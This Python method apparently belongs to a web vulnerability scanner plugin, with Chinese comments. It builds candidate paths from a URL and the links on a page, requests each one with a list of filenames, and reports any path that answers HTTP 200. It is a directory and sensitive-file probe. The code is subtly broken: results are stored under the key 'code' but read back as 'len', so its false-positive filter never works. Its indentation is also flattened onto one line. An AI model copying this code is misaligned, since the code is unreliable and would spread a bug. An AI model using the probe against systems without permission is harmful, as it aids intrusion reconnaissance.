def audit(self): method = self.requests.command # 请求方式 GET or POST headers = self.requests.get_headers() # 请求头 dict类型 url = self.build_url() # 请求完整URL data = self.requests.get_body_data().decode() # POST 数据 resp_data = self.response.get_body_data() # 返回数据 byte类型 resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码 resp_headers = self.response.get_headers() # 返回头 dict类型 path1 = get_parent_paths(url) urls = set(path1) for link in get_links(resp_str, url, True): path1 = get_parent_paths(link) urls |= set(path1) for p in urls: filename = self.file() success = [] for f in filename: _ = p.rstrip('/') + f if not Share.in_url(_): Share.add_url(_) try: r = requests.get(_, headers=headers) # out.log(_) if r.status_code == 200: success.append({"url": _, "code": len(r.text)}) # print(self.name) except Exception as e: pass if len(success) < 5: for i in success: out.success(i["url"], self.name) else: result = {} for item in success: length = item.get("len", 0) if length not in result: result[length] = list() result[length].append(item["url"]) for k, v in result.items(): if len(v) > 3: continue for i in v: out.success(i, self.name)